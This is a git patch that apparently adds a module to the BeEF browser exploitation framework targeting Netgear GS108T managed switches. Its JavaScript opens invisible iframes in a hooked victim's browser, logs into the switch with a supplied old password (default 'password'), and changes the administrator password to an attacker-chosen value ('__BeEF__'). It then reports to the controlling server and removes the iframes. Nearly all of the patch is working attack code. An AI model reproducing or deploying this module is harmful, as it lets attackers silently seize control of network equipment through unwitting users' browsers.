From d354e66a3d5a0c142a05e8bfc83661ba9e4667b4 Mon Sep 17 00:00:00 2001
From: root <root@snort.network.athome>
Date: Thu, 17 May 2012 00:47:33 +0200
Subject: [PATCH] Added module for GS108t managed switch

---
 modules/switch/netgear_gs108t_csrf/command.js | 47 +++++++++++++++++++
 .../switch/netgear_gs108t_csrf/config.yaml    | 25 ++++++++++
 modules/switch/netgear_gs108t_csrf/module.rb  | 30 ++++++++++++
 3 files changed, 102 insertions(+)
 create mode 100644 modules/switch/netgear_gs108t_csrf/command.js
 create mode 100644 modules/switch/netgear_gs108t_csrf/config.yaml
 create mode 100644 modules/switch/netgear_gs108t_csrf/module.rb

diff --git a/modules/switch/netgear_gs108t_csrf/command.js b/modules/switch/netgear_gs108t_csrf/command.js
new file mode 100644
index 000000000..b6c9af227
--- /dev/null
+++ b/modules/switch/netgear_gs108t_csrf/command.js
@@ -0,0 +1,47 @@
+//
+//   Copyright 2012 Bart Leppens
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var base = '<%= @base %>';
+  var oldpassword = '<%= @oldpassword %>';
+  var newpassword = '<%= @newpassword %>';
+ 
+  var gs_iframe = beef.dom.createInvisibleIframe();
+  gs_login = function()  {
+     var d = new Date;
+     var rtime = (d.getTime() / 200);
+     gs_iframe.setAttribute('src', base+'login.cgi?passwd='+oldpassword+'&rtime='+rtime);
+  }
+
+  var gs108t_iframe = beef.dom.createInvisibleIframe();
+  gs_change_pwd = function() {
+     gs108t_iframe.setAttribute('src', base+'password.cgi?inputBox_oldPassword='+oldpassword+'&inputBox_newPassword='+newpassword+'&inputBox_retypeNewPassword='+newpassword);
+  }
+
+  //login to create the cookie
+  gs_login();
+
+  //wait some miliseconds and attempt to change the password
+  setTimeout("gs_change_pwd()", 500);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(gs108t_iframe);
+    document.body.removeChild(gs_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+});
+
diff --git a/modules/switch/netgear_gs108t_csrf/config.yaml b/modules/switch/netgear_gs108t_csrf/config.yaml
new file mode 100644
index 000000000..551964d58
--- /dev/null
+++ b/modules/switch/netgear_gs108t_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Bart Leppens
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        Netgear_gs108t_csrf:
+            enable: true
+            category: "Switch"
+            name: "Netgear GS108T CSRF"
+            description: "Attempts to change the password on a Netgear GS108T managed switch."
+            authors: ["Bart Leppens"]
+            target:
+                working: ["ALL"]
diff --git a/modules/switch/netgear_gs108t_csrf/module.rb b/modules/switch/netgear_gs108t_csrf/module.rb
new file mode 100644
index 000000000..bf87ef66a
--- /dev/null
+++ b/modules/switch/netgear_gs108t_csrf/module.rb
@@ -0,0 +1,30 @@
+#
+#   Copyright 2012 Bart Leppens
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Netgear_gs108t_csrf < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://192.168.0.139/'}, 
+        {'name' => 'oldpassword', 'ui_label' => 'Old Password', 'value' => 'password'}, 
+        {'name' => 'newpassword', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end